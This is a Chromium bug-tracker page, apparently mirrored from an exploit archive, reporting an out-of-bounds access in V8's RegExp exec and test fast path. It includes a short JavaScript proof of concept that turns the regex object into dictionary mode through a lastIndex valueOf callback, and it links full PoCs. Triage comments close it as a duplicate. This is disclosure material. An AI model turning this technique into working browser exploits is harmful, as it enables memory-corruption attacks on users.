Issue metadata
Sign in to add a comment
|
Out-of-bounds access in RegExp.prototype.exec
Reported by
ramiibra...@gmail.com,
Jul 3 2017
|
||||||||||||||||||||
Issue description
There is an out-of-bounds access in RegExp.prototype.exec and RegExp.prototype.test. The code defined in BranchIfFastRegExp checks whether a regular expression object has the default map, however, it is possible to alter the map after this check has been performed. This can cause inline fields, such as lastIndex to be changed to dictionary properties. This will cause out-of-bounds reads and writes the next time lastIndex is accessed on the fast path.
A minimal PoC is as follows, and two full PoCs (one for test and one for exec) are attached.
var re;
function f(){
for(var i = 0; i < 100; i++){
re["test" + i] = 0x77777777; // make a dict
}
return 0;
}
re = /-/g;
var str = '2016-01-02';
re.lastIndex = {valueOf : f};
result = re.exec(str);
This PoC crashes on google-chrome-beta on Linux.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42286.zip
,
Jul 3 2017
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://clusterfuzz.com/testcase?key=5435397424545792.
,
Jul 3 2017
,
Jul 3 2017
This appears to be an exact duplicate of Issue 708247 and does not appear to crash in current versions of Chrome. Please explain why you've filed this bug?
,
Jul 10 2017
Close as WontFix.
,
Oct 17 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||
Comment 1 by ClusterFuzz
, Jul 3 2017